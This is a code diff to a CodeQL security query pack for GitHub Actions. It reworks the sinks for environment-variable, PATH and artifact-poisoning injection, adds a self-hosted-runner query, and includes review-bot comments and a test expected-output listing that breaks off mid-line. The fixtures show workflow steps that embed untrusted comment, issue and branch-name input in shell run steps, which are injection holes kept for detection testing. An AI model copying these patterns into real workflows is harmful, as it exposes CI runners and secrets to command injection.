diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 95dc22a40de..8b7eb51276d 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -299,7 +299,12 @@ class EnvVarInjectionRunStep extends PoisonableStep, Run { } class ArtifactPoisoningSink extends DataFlow::Node { - ArtifactPoisoningSink() { this.asExpr() instanceof PoisonableStep } + ArtifactPoisoningSink() { + exists(PoisonableStep step | + step.(Run).getScriptScalar() = this.asExpr() or + step.(UsesStep) = this.asExpr() + ) + } } /** diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index a5cf2d600f0..25de24032ba 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll 
@@ -5,23 +5,18 @@ import codeql.actions.dataflow.FlowSources private import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.DataFlow -predicate envPathInjectionFromExprSink(DataFlow::Node sink) { - exists(Expression expr, Run run, string value | - Utils::writeToGitHubPath(run, value) and - expr = sink.asExpr() and - run.getAnScriptExpr() = expr and - value.indexOf(expr.getExpression()) > 0 - ) -} +abstract class EnvPathInjectionSink extends DataFlow::Node { } -predicate envPathInjectionFromFileSink(DataFlow::Node sink) { - exists(Run run, UntrustedArtifactDownloadStep step, string value | - sink.asExpr() = run and - step.getAFollowingStep() = run and - Utils::writeToGitHubPath(run, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) - ) +class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { + EnvPathInjectionFromFileReadSink() { + exists(Run run, UntrustedArtifactDownloadStep step, string value | + this.asExpr() = run.getScriptScalar() and + step.getAFollowingStep() = run and + Utils::writeToGitHubPath(run, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + ) + } } /** 
@@ -32,26 +27,23 @@ predicate envPathInjectionFromFileSink(DataFlow::Node sink) { * run: | * echo "$BODY" >> $GITHUB_PATH */ -predicate envPathInjectionFromEnvSink(DataFlow::Node sink) { - exists(Run run, Expression expr, string varname, string value | - sink.asExpr().getInScopeEnvVarExpr(varname) = expr and - run = sink.asExpr() and - Utils::writeToGitHubPath(run, value) and - ( - value = ["$" + varname, "${" + varname + "}", "$ENV{" + varname + "}"] - or - value.matches("$(echo %") and value.indexOf(varname) > 0 +class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { + EnvPathInjectionFromEnvVarSink() { + exists(Run run, Expression expr, string varname, string value | + this.asExpr().getInScopeEnvVarExpr(varname) = expr and + run.getScriptScalar() = this.asExpr() and + Utils::writeToGitHubPath(run, value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + varname + "%") + or + value.matches("$(echo %") and value.indexOf(varname) > 0 + ) ) - ) + } } -private class EnvPathInjectionSink extends DataFlow::Node { - EnvPathInjectionSink() { - envPathInjectionFromExprSink(this) or - envPathInjectionFromFileSink(this) or - envPathInjectionFromEnvSink(this) or - externallyDefinedSink(this, "envpath-injection") - } +class EnvPathInjectionFromMaDSink extends EnvPathInjectionSink { + EnvPathInjectionFromMaDSink() { externallyDefinedSink(this, "envpath-injection") } } /** diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 0ae333a56f5..cdcc1dbdf81 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll 
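Review bot: `EnvPathInjectionFromEnvVarSink` now requires `run.getScriptScalar() = this.asExpr()` but still resolves the variable with `this.asExpr().getInScopeEnvVarExpr(varname)`, i.e. on the script scalar rather than on the `Run` step as before. Whether the scalar node resolves the step's in-scope env entries is not visible here; if it does not, this sink silently matches nothing. The sibling `EnvVarInjectionFromEnvVarSink` in this commit resolves the variable on the step. Writing it as `expr = run.getInScopeEnvVarExpr(varname)` keeps the two queries consistent.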
@@ -5,33 +5,43 @@ import codeql.actions.dataflow.FlowSources private import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.DataFlow -predicate envVarInjectionFromExprSink(DataFlow::Node sink) { - exists(Expression expr, Run run, string key, string value | - Utils::writeToGitHubEnv(run, key, value) and - expr = sink.asExpr() and - run.getAnScriptExpr() = expr and - value.indexOf(expr.getExpression()) > 0 - ) -} +abstract class EnvVarInjectionSink extends DataFlow::Node { } -predicate envVarInjectionFromFileSink(DataFlow::Node sink) { - exists(Run run, UntrustedArtifactDownloadStep step, string value | - sink.asExpr() = run and - step.getAFollowingStep() = run and - Utils::writeToGitHubEnv(run, _, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) - ) -} - -private class EnvVarInjectionSink extends DataFlow::Node { - EnvVarInjectionSink() { - envVarInjectionFromExprSink(this) or - envVarInjectionFromFileSink(this) or - externallyDefinedSink(this, "envvar-injection") +// predicate envVarInjectionFromEnvVarSink(DataFlow::Node sink) { +// exists(Expression expr, Run run, string varName, string key, string value | +// expr = run.getInScopeEnvVarExpr(varName) and +// Utils::writeToGitHubEnv(run, key, value) and +// expr = sink.asExpr() and +// value.matches("%$" + ["", "{", "ENV{"] + varName + "%") +// ) +// } +class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { + EnvVarInjectionFromEnvVarSink() { + exists(Run run, Expression expr, string varname, string key, string value | + expr = run.getInScopeEnvVarExpr(varname) and + Utils::writeToGitHubEnv(run, key, value) and + run.getScriptScalar() = this.asExpr() and + value.matches("%$" + ["", "{", "ENV{"] + varname + "%") + ) } } +class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { + EnvVarInjectionFromFileReadSink() { + exists(Run run, UntrustedArtifactDownloadStep step, string 
value | + this.asExpr() = run.getScriptScalar() and + step.getAFollowingStep() = run and + Utils::writeToGitHubEnv(run, _, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + ) + } +} + +class EnvVarInjectionFromMaDSink extends EnvVarInjectionSink { + EnvVarInjectionFromMaDSink() { externallyDefinedSink(this, "envvar-injection") } +} + /** * A taint-tracking configuration for unsafe user input * that is used to construct and evaluate an environment variable. diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f6efd7fa0f1..1710768761f 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.17 +version: 0.0.18 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql new file mode 100644 index 00000000000..c7bdfbbc323 --- /dev/null +++ b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql 
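Review bot: The commented-out `envVarInjectionFromEnvVarSink` predicate left above `EnvVarInjectionFromEnvVarSink` duplicates the class that replaces it and will drift from it; remove the block and rely on version control for the history. The new sink classes (`EnvVarInjectionFromEnvVarSink`, `EnvVarInjectionFromFileReadSink`, `EnvVarInjectionFromMaDSink`) are public and have no QLDoc. A one-line comment on each, such as `/** A Run step script that writes the value of an in-scope env var to GITHUB_ENV. */`, would document what is flagged.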
@@ -0,0 +1,47 @@ +/** + * @name Pull Request code execution on self-hosted runner + * @description Running untrusted code on a public repository's self-hosted runner can lead to the compromise of the runner machine + * @kind problem + * @problem.severity error + * @security-severity 9.0 + * @precision high + * @id actions/pr-on-self-hosted-runner + * @tags actions + * security + * external/cwe/cwe-284 + */ + +import actions +import codeql.actions.dataflow.ExternalFlow + +/** + * This predicate uses data available in the workflow file to identify self-hosted runners. + * It does not know if the repository is public or private. + * It is a best-effort approach to identify self-hosted runners. + */ +predicate staticallyIdentifiedSelfHostedRunner(Job job) { + exists(string label | + job.getEnclosingWorkflow().getATriggerEvent() = + ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and + label = job.getARunsOnLabel() and + // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/poutine/utils.rego#L49C3-L49C136 + not label + .regexpMatch("(?i)^((ubuntu-(([0-9]{2})\\.04|latest)|macos-([0-9]{2}|latest)(-x?large)?|windows-(20[0-9]{2}|latest)|(buildjet|warp)-[a-z0-9-]+))$") + ) +} + +/** + * This predicate uses data available in the job log files to identify self-hosted runners. + * It is a best-effort approach to identify self-hosted runners. + */ +predicate dynamicallyIdentifiedSelfHostedRunner(Job job) { + exists(string runner_info | + workflowDataModel(job.getEnclosingWorkflow().getLocation().getFile().getRelativePath(), + "public", job.getId(), _, _, runner_info) and + runner_info.matches("self-hosted:true") + ) +} + +from Job job +where staticallyIdentifiedSelfHostedRunner(job) or dynamicallyIdentifiedSelfHostedRunner(job) +select job, "Job runs on self-hosted runner" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 9e8fdef850a..24f07dafe89 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
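Review bot: `staticallyIdentifiedSelfHostedRunner` treats every `runs-on` label that fails the hosted-runner regex as self-hosted, which presumably includes expression labels such as `${{ matrix.os }}` and any hosted label the pattern does not list. It also never checks that the job checks out or runs pull-request code, yet the query is tagged `@precision high`. Consider `@precision medium`, or exclude unresolved labels with `not label.matches("%${{%")`. In `dynamicallyIdentifiedSelfHostedRunner`, `runner_info.matches("self-hosted:true")` has no wildcard and so is an exact comparison; if the column can carry other fields, `runner_info.matches("%self-hosted:true%")` is needed.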
@@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.17 +version: 0.0.18 groups: - actions - queries diff --git a/ql/test/library-tests/test.actual b/ql/test/library-tests/test.actual new file mode 100644 index 00000000000..ee68d409634 --- /dev/null +++ b/ql/test/library-tests/test.actual 
@@ -0,0 +1,598 @@ +files +| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | +| .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | +| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | +workflows +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/test.yml:1:1:40:53 | on: push | +reusableWorkflows +compositeActions +jobs +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +localJobs +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +extJobs +steps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| 
.github/workflows/test.yml:39:9:40:53 | Run Step: sink | +runSteps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ 
github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | +runExprs +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | 
steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +uses +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +stepUses +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +usesArgs +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +runStepChildren +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 
echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +parentNodes +| .github/workflows/expression_nodes.yml:1:5:1:17 | 
issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| 
.github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | 
+| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 
| LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | 
ubuntu-latest | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | 